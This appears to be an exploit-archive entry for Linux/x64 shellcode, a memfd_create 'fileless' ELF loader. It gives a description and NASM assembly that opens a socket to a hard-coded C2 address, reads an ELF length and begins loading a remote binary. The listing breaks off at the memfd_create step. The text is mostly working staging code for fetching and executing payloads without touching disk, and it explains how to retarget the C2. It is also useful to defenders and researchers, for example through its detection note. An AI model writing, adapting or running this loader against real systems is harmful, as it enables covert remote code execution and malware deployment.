Exploits / Vulnerability Discovered: 2023-08-21
Type: shellcode
Platform: linux
This shellcode, a Linux/x64 memfd_create ELF loader (170 bytes), is provided for educational purposes only; if you use it, you do so at your own risk.
# Shellcode Title: Linux/x64 - memfd_create ELF loader (170 bytes)
# Shellcode Author: Ivan Nikolsky (enty8080) & Tomas Globis (tomasglgg)
# Tested on: Linux (x86_64)
# Shellcode Description: This shellcode establishes a reverse TCP connection to a hard-coded C2 (the sockaddr immediate in the connect() block encodes 127.0.0.1:8888 in this listing; patch that immediate to retarget), reads an 8-byte ELF length from the socket, reads the ELF and maps it into memory, creates a memory file descriptor with memfd_create, writes the loaded ELF to it and executes it. It can be used for "fileless" ELF execution because no data is written to a disk-backed file. Caveats: none of the socket(), connect() or read() syscalls have their return values checked, the 8-byte length read from the socket is stored in r12 without validation, and a short read is not handled, so a misbehaving or absent C2 results in undefined behaviour rather than a clean failure. Note also that the memfd remains visible in the process's /proc/<pid>/fd and memory mappings, which is a common detection artifact for this technique.
# Blog post: https://blog.entysec.com/2023-04-02-remote-elf-loading/
# Original code: https://github.com/EntySec/Pawn
section .text
global _start
_start:
; Set up socket for further communication with C2
;
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push 0x29
pop rax
cdq
push 0x2
pop rdi
push 0x1
pop rsi
syscall
; Connect to the C2 server
;
; int connect(int sockfd, {
; sa_family=AF_INET,
; sin_port=htons(8888),
; sin_addr=inet_addr("127.0.0.1")
; }, 16);
xchg rdi, rax
mov rcx, 0x0100007fb8220002
push rcx
mov rsi, rsp
push 0x10
pop rdx
push 0x2a
pop rax
syscall
; Read ELF length from socket
;
; read(unsigned int fd, char *buf, 8);
pop rcx
push 0x8
pop rdx
push 0x0
lea rsi, [rsp]
xor rax, rax
syscall
; Save length to r12 and socket descriptor to r13
pop r12
push rdi
pop r13
; Create file descriptor for ELF file
;
; int memfd_create("", 0);